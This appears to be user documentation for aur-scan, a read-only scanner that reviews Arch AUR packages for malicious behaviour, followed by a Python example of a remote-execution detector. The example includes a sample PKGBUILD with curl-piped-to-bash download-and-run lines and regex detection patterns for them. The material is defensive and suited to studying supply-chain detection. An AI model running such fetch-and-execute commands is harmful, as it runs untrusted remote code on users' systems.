Commands

aur-scan check — pre-install review

Resolves the full transitive AUR dependency tree, scans every untrusted package, prints a reviewable tree, and can emit a CycloneDX SBOM — all before anything builds. A hijacked package is often a dependency, so the named package alone is not enough.

aur-scan check <package>...
aur-scan check <package> --sbom tree.cdx.json     # write an SBOM
aur-scan check <package> --no-confirm --fail-on high   # CI gate
aur-scan check --local ./mypkg                    # scan exact on-disk bytes

aur-scan install — race-free install

Fetch each AUR package once, scan those exact directories, gate on findings, then build them in dependency order with makepkg. The bytes scanned are the bytes built — no time-of-check/time-of-use gap.

aur-scan install <package>...
aur-scan install <package> --gate high       # block on high+ findings
aur-scan install <package> --sbom tree.cdx.json

aur-scan scan — local PKGBUILD

aur-scan scan ./PKGBUILD
aur-scan scan ./my-package/        # directory (PKGBUILD + .install)
aur-scan scan ./pkg --format sarif # text | json | sarif

aur-scan system — audit what’s installed

Cross-references every installed AUR package against the IOC database, scans cached PKGBUILDs, and flags any package that gained risky behavior since the last scan.

aur-scan system
aur-scan -c ti.toml system   # also VT/URLhaus-check every installed package (opt-in)

aur-scan ioc — indicators of compromise

aur-scan ioc                 # database stats + campaigns
aur-scan ioc --check <name>  # is this a known-malicious indicator?

aur-scan codes / explain

aur-scan codes                       # the full detection catalog
aur-scan codes --format markdown     # or json
aur-scan explain EXEC-REMOTE         # detail on one code

Global flags

These apply to any command:

-c, --config <FILE>     # load a config (enables opt-in threat intelligence; see below)
-s, --severity <LEVEL>  # minimum severity to report: critical|high|medium|low|info
    --fail-on <LEVEL>   # (scan) exit non-zero at or above this severity — for CI gates
    --no-color          # disable ANSI color (also honored: the NO_COLOR env var)
-q, --quiet             # only show findings
-v, --verbose

-c turns on threat intelligence — optional, opt-in VirusTotal / URLhaus lookups that are off unless you enable them and supply your own key. A scan with no config makes zero network calls.

One thing worth knowing

aur-scan only ever reads. It doesn’t source the PKGBUILD, doesn’t run makepkg to peek inside, doesn’t follow a URL it finds, doesn’t run anything it downloads. So when a package tries to pull and run code from somewhere else, it tells you (that’s EXEC-REMOTE, and it gives you the URL) and stops. It won’t go fetch that code, because then the scanner would be the thing running the payload. “We can’t see past this point” is the honest answer, and it’s the safe one.
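To make that read-only stance concrete, here is an added example (not aur-scan's own code) of how an EXEC-REMOTE-style check can work purely on the text of a PKGBUILD: it matches download-then-execute shapes, reports the URL it found, and never fetches it. The sample PKGBUILD, the regex shapes, the finding fields and the severity chosen are constructed for this illustration.

```python
import re

# Constructed sample PKGBUILD (not a real AUR package). prepare() pipes a
# remote script into bash; build() also downloads a tarball normally, which
# the detector must NOT flag, since fetching alone is not execution.
SAMPLE_PKGBUILD = """\
pkgname=example-tool
pkgver=1.0.0
source=("https://example.invalid/example-tool-1.0.0.tar.gz")

prepare() {
  # curl https://example.invalid/old.sh | sh   (commented out: ignored)
  curl -fsSL https://example.invalid/setup.sh | bash
}

build() {
  wget -O extra.tar.gz https://example.invalid/extra.tar.gz
  bash <(curl -s https://example.invalid/env.sh)
  make
}
"""

URL = r"https?://[^\s'\"|;)<>]+"
# Three shapes of "download something, then run what was downloaded":
#   fetcher ... URL ... | [sudo] sh/bash/zsh/dash
#   sh/bash <(fetcher ... URL ...)
#   eval "$(fetcher ... URL ...)"
EXEC_REMOTE_PATTERNS = [
    re.compile(r"\b(?:curl|wget)\b[^|\n]*?(" + URL + r")[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"),
    re.compile(r"\b(?:ba|z|da)?sh\s+<\(\s*(?:curl|wget)\b[^)]*?(" + URL + r")"),
    re.compile(r"\beval\s+[\"']?\$\(\s*(?:curl|wget)\b[^)]*?(" + URL + r")"),
]

def scan_exec_remote(text):
    """Return one finding per line that downloads and executes remote code.
    Purely textual: the PKGBUILD is never sourced and no URL is fetched."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank line or shell comment
        for pattern in EXEC_REMOTE_PATTERNS:
            match = pattern.search(stripped)
            if match:
                # "critical" is the severity assumed for this illustration.
                findings.append({"code": "EXEC-REMOTE", "severity": "critical",
                                 "line": lineno, "url": match.group(1)})
                break
    return findings

if __name__ == "__main__":
    for f in scan_exec_remote(SAMPLE_PKGBUILD):
        print(f"{f['code']} ({f['severity']}) line {f['line']}: {f['url']}")
```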